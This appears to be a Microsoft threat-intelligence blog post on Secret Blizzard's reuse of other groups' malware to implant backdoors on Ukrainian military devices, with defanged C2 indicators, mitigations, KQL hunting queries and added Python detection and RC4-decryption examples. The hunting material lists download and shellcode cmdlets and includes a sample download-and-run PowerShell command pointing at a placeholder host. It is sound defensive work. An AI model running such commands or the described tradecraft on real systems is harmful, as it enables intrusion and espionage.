Finally, we believe that passkey adoption is a virtuous cycle, and transitioning the world away from passwords is bigger than any one company. As more relying parties prioritize passkey support, passkeys will first become recognized, then familiar, then expected—everywhere you sign in. As people become increasingly familiar with the usability and security benefits of passkeys, they’ll be more likely to enroll and use them on more sites. Together, we can convince billions and billions of users to enroll passkeys for trillions of accounts! We’re proud to be part of this collective effort and hope you will share learnings as well as you progress in your passkey journey.
Learn more
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1 Microsoft Digital Defense Report 2024.
The post Convincing a billion users to love passkeys: UX design insights from Microsoft to boost adoption and security appeared first on Microsoft Security Blog.
Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine
After co-opting the tools and infrastructure of another nation-state threat actor to facilitate espionage activities, as detailed in our last blog, Russian nation-state actor Secret Blizzard used those tools and infrastructure to compromise targets in Ukraine. Microsoft Threat Intelligence has observed that these campaigns consistently led to the download of Secret Blizzard’s custom malware, with the Tavdig backdoor creating the foothold to install their KazuarV2 backdoor.
Between March and April 2024, Microsoft Threat Intelligence observed Secret Blizzard using the Amadey bot malware relating to cybercriminal activity that Microsoft tracks as Storm-1919 to download its backdoors to specifically selected target devices associated with the Ukrainian military. This was at least the second time since 2022 that Secret Blizzard has used a cybercrime campaign to facilitate a foothold for its own malware in Ukraine. Microsoft also assesses that in January 2024, Secret Blizzard used the backdoor of Storm-1837, a Russia-based threat actor that targets Ukrainian military drone pilots, to download the Tavdig and KazuarV2 backdoors on a target device in Ukraine.
Commandeering other threat actors’ access highlights Secret Blizzard’s approach to diversifying its attack vectors, including using strategic web compromises (watering holes) and adversary-in-the-middle (AiTM) campaigns likely facilitated via legally mandated intercept systems in Russia such as the “System for Operative Investigative Activities” (SORM). More commonly, Secret Blizzard uses spear phishing as its initial attack vector, then server-side and edge device compromises to facilitate further lateral movement within a network of interest.
As previously detailed, Secret Blizzard is known for targeting a wide array of sectors, but most prominently ministries of foreign affairs, embassies, government offices, defense departments, and defense-related companies worldwide. Secret Blizzard focuses on gaining long-term access to systems for intelligence collection, often seeking out advanced research and information of political importance, using extensive resources such as multiple backdoors. The United States Cybersecurity and Infrastructure Security Agency (CISA) has attributed Secret Blizzard to Center 16 of Russia’s Federal Security Service (FSB). Secret Blizzard overlaps with the threat actor tracked by other security vendors as Turla, Waterbug, Venomous Bear, Snake, Turla Team, and Turla APT Group.
Microsoft tracks Secret Blizzard campaigns and, when we are able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on Secret Blizzard’s activity to raise awareness of this threat actor’s tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity. In addition, we highlight that while Secret Blizzard’s use of infrastructure and access by other threat actors is unusual, it is not unique, and therefore organizations that have been compromised by one threat actor may also find themselves compromised by another through the initial intrusion.
Amadey bot use and post-compromise activities
Between March and April 2024, Microsoft observed Secret Blizzard likely commandeering Amadey bots to ultimately deploy their custom Tavdig backdoor. Microsoft tracks some cybercriminal activity associated with Amadey bots as Storm-1919. Storm-1919's post-infection goal is most often to deploy XMRIG cryptocurrency miners onto victim devices. Amadey bots have been deployed by Secret Blizzard and other threat actors comprising Storm-1919 to numerous devices around the world during 2024.
Microsoft assesses that Secret Blizzard either used the Amadey malware as a service (MaaS) or accessed the Amadey command-and-control (C2) panels surreptitiously to download a PowerShell dropper on target devices. The PowerShell dropper contained a Base64-encoded Amadey payload appended by code that invoked a request to Secret Blizzard C2 infrastructure.
Figure 1. Amadey payload calling back to Secret Blizzard C2 infrastructure
The Amadey instance was version 4.18, but generally had the same functionality as the Amadey bot described in a Splunk blog from July 2023 analyzing version 3.83.
The Amadey sample gathered a significant amount of information about the victim system, including the administrator status and device name from the registry, and checked for installed antivirus software by seeing if it had a folder in C:\ProgramData. Numbers were recorded for each software found and likely sent back to the C2:
- Avast Software
- Avira
- Kaspersky Lab
- ESET
- Panda Security
- Doctor Web
- AVG
- 360TotalSecurity
- Bitdefender
- Norton
- Sophos
- Comodo
The retrieved information was gathered from the system to be encoded into the communication sent to the C2 at hxxp://vitantgroup[.]com/xmlrpc.php. The Amadey bot then attempted to download two plugins from the C2 server:
- hxxp://vitantgroup[.]com/Plugins/cred64.dll
- hxxp://vitantgroup[.]com/Plugins/clip64.dll
Microsoft did not observe the two DLLs on the devices accessed by Secret Blizzard, but it is likely that they performed the same role as in other similar Amadey bots—to collect clipboard data and browser credentials. The need to encode the PowerShell dropper with a separate C2 URL controlled by Secret Blizzard could indicate that Secret Blizzard was not directly in control of the C2 mechanism used by the Amadey bot.
Subsequently, Microsoft observed Secret Blizzard downloading their custom reconnaissance or survey tool. This tool was selectively deployed to devices of further interest by the threat actor—for example, devices egressing from STARLINK IP addresses, a common signature of Ukrainian front-line military devices. The survey tool consisted of an executable that decrypted a batch script or cmdlets at runtime using what appears to be a custom RC4 algorithm. One of the batch scripts invoked the following command:
Figure 2. Batch script command
The batch script collected a survey of the victim device, including the directory tree, system information, active sessions, IPv4 route table, SMB shares, enabled security groups, and time settings. This information was encrypted using the same RC4 function and transmitted to the previously referenced Secret Blizzard C2 server at hxxps://citactica[.]com/wp-content/wp-login.php.
In another use of the survey tool observed by Microsoft Threat Intelligence, the executable simply decrypted the cmdlet dir "%programdata%\Microsoft\Windows Defender\Support". The %programdata%\Microsoft\Windows Defender\Support folder contains various Microsoft Defender logs, such as entries of detected malicious files.
Microsoft assesses that this cmdlet was invoked to determine if Microsoft Defender was enabled and whether previous Amadey activity had been flagged by the engine. Since several of the targeted devices observed by Microsoft had Microsoft Defender disabled during initial infection, the Secret Blizzard implants were only observed by Microsoft weeks or months after initial malware deployment.
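As an added illustration (not from the post and not the actor's tooling), here is how an analyst would try to recover an RC4-protected script once candidate keys have been pulled from the executable's strings. It implements textbook RC4; the post only says the routine "appears to be a custom RC4 algorithm", so a real sample may need a modified key schedule or output stage. The key, the embedded blob and the stand-in batch script are constructed for the demo.

```python
from typing import Iterable, Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encrypting and decrypting are the same call."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII or whitespace. A decrypted batch
    script sits at 1.0; a wrong key yields random bytes near 0.4."""
    if not data:
        return 0.0
    good = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return good / len(data)


def try_candidate_keys(blob: bytes, candidates: Iterable[bytes],
                       threshold: float = 0.95) -> Optional[Tuple[bytes, str]]:
    """Try each candidate key (for example strings dumped from the binary) and
    return the first one whose output looks like text, with the recovered script."""
    for key in candidates:
        plain = rc4(key, blob)
        if printable_ratio(plain) >= threshold:
            return key, plain.decode("ascii", errors="replace")
    return None


# Constructed stand-in for the embedded survey script. These commands cover the
# categories the post lists (directory tree, system info, sessions, IPv4 routes,
# SMB shares, groups, time settings); they are not the actor's batch script.
SAMPLE_SCRIPT = (
    "@echo off\r\n"
    "tree C:\\ /f\r\n"
    "systeminfo\r\n"
    "query user\r\n"
    "route print -4\r\n"
    "net share\r\n"
    "whoami /groups\r\n"
    "w32tm /tz\r\n"
)
SAMPLE_KEY = b"s3cr3t-survey-key"          # hypothetical key recovered from the binary
SAMPLE_BLOB = rc4(SAMPLE_KEY, SAMPLE_SCRIPT.encode("ascii"))


def recover_sample() -> Optional[Tuple[bytes, str]]:
    """Walk a list of candidate strings the way an analyst would after dumping them."""
    return try_candidate_keys(SAMPLE_BLOB, [b"kavp", b"rastls", b"procmap", SAMPLE_KEY])
```

Because the post says the survey output was encrypted with the same routine before transmission, the same rc4 call with the recovered key also decodes captured C2 traffic from that tool; the printable-ratio check is what lets you tell a correct key from a wrong one without a known plaintext.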
Microsoft assesses that Secret Blizzard generally used the survey tool to determine if a victim device was of further interest, in which case it would deploy a PowerShell dropper containing the Tavdig backdoor payload (rastls.dll) and a legitimate Symantec binary (kavp.exe) that is susceptible to DLL sideloading, so the legitimate executable loads the attacker-supplied rastls.dll in place of the library it expects. The C2 configuration for Tavdig was:
- hxxps://icw2016.coachfederation[.]cz/wp-includes/images/wp/
- hxxps://hospitalvilleroy[.]com[.]br/wp-includes/fonts/icons/
On several of the victim devices, the Tavdig loader was deployed using an executable named procmap.exe, which used the Microsoft Macro Assembler (MASM) compiler (QEditor). Microsoft assesses that procmap.exe was used to compile and run malicious ASM files on victim devices within Ukraine in March 2024, which then invoked a PowerShell script that subsequently loaded the Amadey bots and the Tavdig backdoor.
Secret Blizzard then used the Tavdig backdoor—loaded into kavp.exe—to conduct further reconnaissance on the device, including user info, netstat, and installed patches. Secret Blizzard also used Tavdig to import a registry file into the registry of the victim device, which likely installed the persistence mechanism and payload for the KazuarV2 backdoor.
Figure 3. Example of how Amadey bots were used to load the Tavdig backdoor
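DLL sideloading works because Windows resolves a DLL name from the application's own directory before the system directories, so a legitimate executable dropped next to an attacker-supplied DLL of the expected name loads it under the executable's reputation. The following added example (not Microsoft's detection logic) scores image-load records for that pattern over constructed events; the kavp.exe and rastls.dll names come from the post, while the paths, signer strings, protected-root list, hijack-name shortlist and the other hosts are assumptions.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Tuple

# Directories a standard user cannot write to; everything else is treated as
# attacker-controllable by this heuristic (constructed list).
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# DLL names commonly dropped beside a host binary so they are picked up from the
# application directory ahead of System32 (constructed shortlist).
COMMONLY_HIJACKED = {"version.dll", "dwmapi.dll", "cryptbase.dll", "userenv.dll", "profapi.dll"}


@dataclass
class ImageLoad:
    device: str
    process_path: str
    process_signer: str   # "" when unsigned
    dll_path: str
    dll_signer: str       # "" when unsigned


def same_directory(a: str, b: str) -> bool:
    return str(PureWindowsPath(a).parent).lower() == str(PureWindowsPath(b).parent).lower()


def user_writable(path: str) -> bool:
    return not path.lower().startswith(PROTECTED_ROOTS)


def sideload_reasons(ev: ImageLoad) -> List[str]:
    """Why this load looks like a trusted host executing an attacker-supplied DLL."""
    reasons = []
    if same_directory(ev.process_path, ev.dll_path):
        reasons.append("dll_next_to_host")      # app dir is searched before System32
    if user_writable(ev.dll_path):
        reasons.append("user_writable_dir")
    if ev.process_signer and ev.dll_signer != ev.process_signer:
        reasons.append("signer_mismatch")       # signed host, unsigned or foreign DLL
    if PureWindowsPath(ev.dll_path).name.lower() in COMMONLY_HIJACKED:
        reasons.append("known_hijack_name")
    return reasons


REQUIRED = {"dll_next_to_host", "user_writable_dir", "signer_mismatch"}


def detect_sideloads(events) -> List[Tuple[str, str, List[str]]]:
    """Flag loads meeting all three core conditions; the name match is extra context."""
    hits = []
    for ev in events:
        reasons = sideload_reasons(ev)
        if REQUIRED <= set(reasons):
            hits.append((ev.device, ev.dll_path, reasons))
    return hits


# Constructed image-load records. The kavp.exe / rastls.dll pair mirrors the post;
# the paths, signer strings and the other hosts are invented for the demo.
SAMPLE_LOADS = [
    ImageLoad("host-a", r"C:\Users\u\AppData\Local\Temp\kavp.exe", "Symantec Corporation",
              r"C:\Users\u\AppData\Local\Temp\rastls.dll", ""),
    ImageLoad("host-b", r"C:\Program Files\Vendor\app.exe", "Vendor Inc",
              r"C:\Program Files\Vendor\helper.dll", "Vendor Inc"),
    ImageLoad("host-c", r"C:\Users\u\Downloads\tool.exe", "",
              r"C:\Windows\System32\kernel32.dll", "Microsoft Windows"),
    ImageLoad("host-d", r"C:\Users\u\Desktop\portable\editor.exe", "Acme Ltd",
              r"C:\Users\u\Desktop\portable\plugin.dll", "Acme Ltd"),
    ImageLoad("host-e", r"C:\ProgramData\Updater\svc.exe", "Acme Ltd",
              r"C:\ProgramData\Updater\version.dll", ""),
]
```

The signer comparison is what keeps portable applications with their own signed plugins (host-d) out of the results; a vendor's executable loading an unsigned DLL from a user-writable directory (host-a, host-e) is the shape of the kavp.exe case above. On a real estate the signer fields come from the image-load telemetry's certificate data, and the protected-root list should be extended with any locked-down deployment paths you use.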
The KazuarV2 payload was often injected into a process such as explorer.exe or a browser process such as opera.exe to facilitate command and control through compromised web servers hosting the Secret Blizzard relay and encryption module (index.php). This module facilitated encryption and onward transmission of command output and exfiltrated data from the affected device to the next-level Secret Blizzard infrastructure.
Storm-1837 PowerShell backdoor use
Microsoft has observed Storm-1837 (overlaps with activity tracked by other security providers as Flying Yeti and UAC-0149) targeting devices belonging to the military of Ukraine since December 2023. Storm-1837 is a Russia-based threat actor that has focused on devices used by Ukrainian drone operators. Storm-1837 uses a range of PowerShell backdoors including the backdoor that the Computer Emergency Response Team of Ukraine (CERT-UA) has named Cookbox as well as an Android backdoor impersonating a legitimate system used for AI processing called "Griselda", which according to CERT-UA is based on the Hydra Android banking malware and facilitates the collection of session data (HTTP cookies), contacts, and keylogging. In May 2024, Cloudflare detailed a Storm-1837 espionage phishing campaign against Ukrainian military devices for which Storm-1837 used both GitHub and Cloudflare for staging and C2.
In January 2024, Microsoft observed a military-related device in Ukraine compromised by a Storm-1837 backdoor configured to use the Telegram API to launch a cmdlet with credentials (supplied as parameters) for an account on the file-sharing platform Mega. The cmdlet appeared to have facilitated remote connections to the account at Mega and likely invoked the download of commands or files for launch on the target device. When the Storm-1837 PowerShell backdoor launched, Microsoft noted a PowerShell dropper deployed to the device. The dropper was very similar to the one observed during the use of Amadey bots and contained two base64 encoded files containing the previously referenced Tavdig backdoor payload (rastls.dll) and the Symantec binary (kavp.exe).
As with the Amadey bot attack chain, Secret Blizzard used the Tavdig backdoor loaded into kavp.exe to conduct initial reconnaissance on the device. Secret Blizzard then used Tavdig to import a registry file, which was used to install and provide persistence for the KazuarV2 backdoor, which was subsequently observed launching on the affected device.
Although Microsoft did not directly observe the Storm-1837 PowerShell backdoor downloading the Tavdig loader, based on the temporal proximity between the execution of the Storm-1837 backdoor and the observation of the PowerShell dropper, Microsoft assesses that it is likely that the Storm-1837 backdoor was used by Secret Blizzard to deploy the Tavdig loader.
Summary assessments
Microsoft Threat Intelligence is still investigating how Secret Blizzard gained control of the Storm-1837 backdoor or Amadey bots to download its own tools onto devices in Ukraine. It is possible, for example, that Secret Blizzard operators could have purchased the use of Amadey bots, or it may have surreptitiously commandeered a part of the Amadey attack chain.
Regardless of the means, Microsoft Threat Intelligence assesses that Secret Blizzard’s pursuit of footholds provided by or stolen from other threat actors highlights this threat actor’s prioritization of accessing military devices in Ukraine. During its operations, Secret Blizzard has used an RC4 encrypted executable to decrypt various survey cmdlets and scripts, a method Microsoft assesses Secret Blizzard is likely to use beyond the immediate campaign discussed here.
Secret Blizzard deployed tools to these (non-domain-joined) devices that were designed for espionage against large domain-joined environments. However, this threat actor has also built new functionality into them to make them more relevant for the espionage specifically conducted against Ukrainian military devices. In addition, Microsoft assesses Secret Blizzard has likely also attempted to use these footholds to tunnel and escalate toward strategic access at the Ministry level.
When parts one and two of this blog series are taken together, it indicates that Secret Blizzard has been using footholds from third parties—either by surreptitiously stealing or purchasing access—as a specific and deliberate method to establish footholds of espionage value. Nevertheless, Microsoft assesses that while this approach has some benefits that could lead more threat adversaries to use it, it is of less use against hardened networks, where good endpoint and network defenses enable the detection of activities of multiple threat adversaries for remediation.
Mitigations
To harden networks against the Secret Blizzard activity listed above, defenders can implement the following:
Strengthen Microsoft Defender for Endpoint configuration
- Microsoft Defender XDR customers can implement attack surface reduction rules to harden an environment against techniques used by threat actors.
- Block execution of potentially obfuscated scripts.
- Block process creations originating from PSExec and WMI commands.
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion.
- Block abuse of exploited vulnerable signed drivers.
- Block Webshell creation for Servers.
- Enable network protection in Microsoft Defender for Endpoint.
- Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
- Run endpoint detection and response in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Strengthen Microsoft Defender Antivirus configuration
- Turn on PUA protection in block mode in Microsoft Defender Antivirus.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving threat actor tools and techniques.
- Turn on Microsoft Defender Antivirus real-time protection.
Strengthen operating environment configuration
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Implement PowerShell execution policies to control conditions under which PowerShell can load configuration files and run scripts. Execution policy is a safety feature rather than a security boundary (it is bypassed with -ExecutionPolicy Bypass or an encoded command line), so pair it with the attack surface reduction rules above and with logging.
- Turn on and monitor PowerShell module and script block logging.
Microsoft Defender Antivirus detects this threat as the following malware:
- Trojan:Win32/Tavdig.Crypt
- Trojan:JS/Kazuar.A
Microsoft Defender Antivirus detects additional threat components that may be related as the following malware:
- Trojan:Win32/Amadey
- Trojan:MSIL/Amadey
- TrojanDownloader:Win32/Amadey
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
- Secret Blizzard Actor activity detected
Surface instances of the Secret Blizzard indicators of compromise file hashes.
let fileHashes = dynamic([
    "ee8ef58f3bf0dab066eb608cb0f167b1585e166bf4730858961c192860ceffe9",
    "d26ac1a90f3b3f9e11491f789e55abe5b7d360df77c91a597e775f6db49902ea",
    "d7e528b55b2eeb6786509664a70f641f14d0c13ceec539737eef26857355536e",
    "dfdc0318f3dc5ba3f960b1f338b638cd9645856d2a2af8aa33ea0f9979a9ca4c",
    "ced8891ea8d87005de989f25f0f94634d1fc70ebb37302cf21aa0c0b0e13350f"]);
// in~ is case-insensitive. The SHA256 columns hold lowercase hex, so a mixed-case
// hash compared with the case-sensitive in operator would silently never match.
union
    (DeviceFileEvents | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"),
    (DeviceEvents | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"),
    (DeviceImageLoadEvents | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"),
    (DeviceProcessEvents | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents")
| order by Timestamp desc
Surface instances of the Secret Blizzard indicators of compromise C2s.
let domainList = dynamic(["citactica.com", "icw2016.coachfederation.cz", "hospitalvilleroy.com.br", "vitantgroup.com", "brauche-it.de", "okesense.oketheme.com", "coworkingdeamicis.com", "plagnol-charpentier.fr"]);
// Written for a Microsoft Sentinel workspace: DnsEvents, VMConnection and W3CIISLog do not exist in
// Defender advanced hunting, and every table there carries TimeGenerated. Each branch projects
// TimeGenerated and a string Domain so the union lines up and the final sort applies to all rows.
union
    (DnsEvents | where Name has_any(domainList) | project TimeGenerated, Domain = Name, SourceTable = "DnsEvents"),
    (IdentityQueryEvents | where QueryTarget has_any(domainList) | project TimeGenerated, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"),
    (DeviceNetworkEvents | where RemoteUrl has_any(domainList) | project TimeGenerated, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"),
    (DeviceNetworkInfo | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks) | mv-expand DnsAddresses, ConnectedNetworks | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList) | project TimeGenerated, Domain = tostring(coalesce(DnsAddresses, ConnectedNetworks.Name)), SourceTable = "DeviceNetworkInfo"),
    (VMConnection | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames) | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList) | project TimeGenerated, Domain = tostring(coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames)), SourceTable = "VMConnection"),
    (W3CIISLog | where csHost has_any(domainList) or csReferer has_any(domainList) | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"),
    (EmailUrlInfo | where UrlDomain has_any(domainList) | project TimeGenerated, Domain = UrlDomain, SourceTable = "EmailUrlInfo"),
    (UrlClickEvents | where Url has_any(domainList) | project TimeGenerated, Domain = Url, SourceTable = "UrlClickEvents")
| order by TimeGenerated desc
Additional hunting queries for likely malicious PowerShell commands can be found in this repository.
Look for PowerShell execution events that might involve a download.
```kql
// Finds PowerShell execution events that could involve a download.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
| where ProcessCommandLine has "Net.WebClient"
    or ProcessCommandLine has "DownloadFile"
    or ProcessCommandLine has "Invoke-WebRequest"
    or ProcessCommandLine has "Invoke-Shellcode"
    or ProcessCommandLine has "http"
    or ProcessCommandLine has "IEX"
    or ProcessCommandLine has "Start-BitsTransfer"
    or ProcessCommandLine has "mpcmdrun.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
```
Look for encoded PowerShell execution events.
```kql
// Detect Encoded PowerShell
DeviceProcessEvents
| where ProcessCommandLine matches regex @'(\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s).*([A-Za-z0-9+/]{50,}[=]{0,2})'
// -EncodedCommand payloads are UTF-16LE; stripping the NUL bytes leaves the readable text.
| extend DecodedCommand = replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine)))
```
Microsoft Sentinel
```yaml
id: f58a7f64-acd3-4cf6-ab6d-be76130cf251
name: Detect Encoded Powershell
description: |
  This query will detect encoded Powershell based on the parameters passed during process creation.
  This query will also work if the PowerShell executable is renamed or tampered with since detection is based solely on a regex of the launch string.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
query: |
  DeviceProcessEvents
  | where ProcessCommandLine matches regex @'(\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s).*([A-Za-z0-9+/]{50,}[=]{0,2})'
  | extend DecodedCommand = replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine)))
```
Look for PowerShell downloads.
```yaml
id: c34d1d0e-1cf4-45d0-b628-a2cfde329182
name: PowerShell downloads
description: |
  Finds PowerShell execution events that could involve a download.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where Timestamp > ago(7d)
  | where FileName in~ ("powershell.exe", "powershell_ise.exe")
  | where ProcessCommandLine has "Net.WebClient"
      or ProcessCommandLine has "DownloadFile"
      or ProcessCommandLine has "Invoke-WebRequest"
      or ProcessCommandLine has "Invoke-Shellcode"
      or ProcessCommandLine has "http"
      or ProcessCommandLine has "IEX"
      or ProcessCommandLine has "Start-BitsTransfer"
      or ProcessCommandLine has "mpcmdrun.exe"
  | project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
```
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal, to get more information about this threat actor.
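The two PowerShell hunting queries above, "PowerShell downloads" and "Detect Encoded Powershell", re-implemented in Python over constructed sample process-creation records, as an added example that is not part of the original post or the Sentinel repository. It goes one step beyond the page's queries by also running the download-term check over the decoded payload; the has_term helper, the record layout and every sample value are assumptions of this example.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Keyword list taken from the 'PowerShell downloads' query.
DOWNLOAD_TERMS = ["Net.WebClient", "DownloadFile", "Invoke-WebRequest", "Invoke-Shellcode",
                  "http", "IEX", "Start-BitsTransfer", "mpcmdrun.exe"]
POWERSHELL_NAMES = {"powershell.exe", "powershell_ise.exe"}
# Switch part of the Sentinel rule's regex. Python only accepts scoped inline flags,
# so the KQL '(?i)' is written '(?i:...)' here; the meaning is unchanged.
ENCODED_SWITCH_RE = re.compile(r"\s+-(?i:encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s")
# The base64 run the KQL extract() pulls out: 50+ alphabet chars plus optional padding.
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{50,}={0,2}")

@dataclass
class ProcessEvent:  # the DeviceProcessEvents columns the two queries use
    timestamp: str
    device_name: str
    file_name: str
    command_line: str

@dataclass
class Finding:
    timestamp: str
    device_name: str
    rule: str
    detail: str  # matched term, or the decoded payload

def has_term(text: str, phrase: str) -> bool:
    """Approximation of KQL `has`: case-insensitive match on whole terms, so "IEX"
    matches "IEX (...)" but not "iexplore.exe", which a substring check would flag."""
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(phrase) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None

def download_indicators(command_line: str) -> List[str]:
    """Terms from the 'PowerShell downloads' query present in the command line."""
    return [term for term in DOWNLOAD_TERMS if has_term(command_line, term)]

def extract_encoded_command(command_line: str) -> Optional[str]:
    """Decoded -EncodedCommand payload, or None when the Sentinel regex does not match.
    PowerShell base64-encodes UTF-16LE text, so the bytes are decoded as UTF-16LE instead
    of being decoded as UTF-8 with the NUL bytes stripped, as the KQL does."""
    switch = ENCODED_SWITCH_RE.search(command_line)
    if switch is None:
        return None
    run = BASE64_RUN_RE.search(command_line, switch.end())
    if run is None:  # short blobs stay below the rule's 50-character threshold
        return None
    blob = run.group(0)
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by the caller
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:  # odd byte count or a non-PowerShell encoding
        return raw.decode("latin-1")

def hunt(events: List[ProcessEvent]) -> List[Finding]:
    """Apply both rules. The download rule is scoped to powershell.exe / powershell_ise.exe
    like the KQL; the encoded rule inspects only the launch string, so it still fires for
    a renamed host binary. Beyond the page's queries, the download terms are also checked
    inside the decoded payload."""
    findings: List[Finding] = []
    for ev in events:
        if ev.file_name.lower() in POWERSHELL_NAMES:
            for term in download_indicators(ev.command_line):
                findings.append(Finding(ev.timestamp, ev.device_name, "PowerShell downloads", term))
        decoded = extract_encoded_command(ev.command_line)
        if decoded is not None:
            findings.append(Finding(ev.timestamp, ev.device_name, "Detect Encoded Powershell", decoded))
            for term in download_indicators(decoded):
                findings.append(Finding(ev.timestamp, ev.device_name, "Encoded payload download term", term))
    return sorted(findings, key=lambda f: f.timestamp, reverse=True)  # order by Timestamp desc

# Constructed sample input, not real telemetry. The payload is encoded the way
# powershell.exe -EncodedCommand expects it: UTF-16LE text, then base64.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcessEvent("2024-12-01T10:00:00Z", "ws01", "powershell.exe",
                 f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"),
    ProcessEvent("2024-12-01T10:01:00Z", "ws02", "powershell.exe",
                 'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/x -OutFile x.exe"'),
    ProcessEvent("2024-12-01T10:02:00Z", "ws03", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent("2024-12-01T10:03:00Z", "ws04", "powershell.exe",
                 'powershell.exe -c "Start-Process iexplore.exe"'),  # benign: "iex" is not a whole term
    ProcessEvent("2024-12-01T10:04:00Z", "ws05", "updater.exe",  # renamed PowerShell host
                 f"updater.exe -e {ENCODED}"),
    ProcessEvent("2024-12-01T10:05:00Z", "ws06", "powershell.exe",
                 "powershell.exe -enc dABlAHMAdAA="),  # too short to match the rule
]
```

Calling hunt(SAMPLE_EVENTS) returns findings for ws01, ws02 and ws05 only; the renamed host on ws05 is caught by the encoded rule but, as in the KQL, never enters the download rule.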
Microsoft Defender Threat Intelligence
Indicators of compromise
| Indicator | Type | Association | Last seen |
| --- | --- | --- | --- |
| hxxps://citactica[.]com/wp-content/wp-login.php | C2 domain (Survey Tool and Amadey dropper) | Secret Blizzard | April 2024 |
| a56703e72f79b4ec72b97c53fbd8426eb6515e3645cb02e7fc99aaaea515273e | Tavdig payload (rastls.dll) | Secret Blizzard | April 2024 |
| hxxps://icw2016.coachfederation[.]cz/wp-includes/images/wp/ | Tavdig C2 domain | Secret Blizzard | April 2024 |
| hxxps://hospitalvilleroy[.]com[.]br/wp-includes/fonts/icons/ | Tavdig C2 domain | Secret Blizzard | April 2024 |
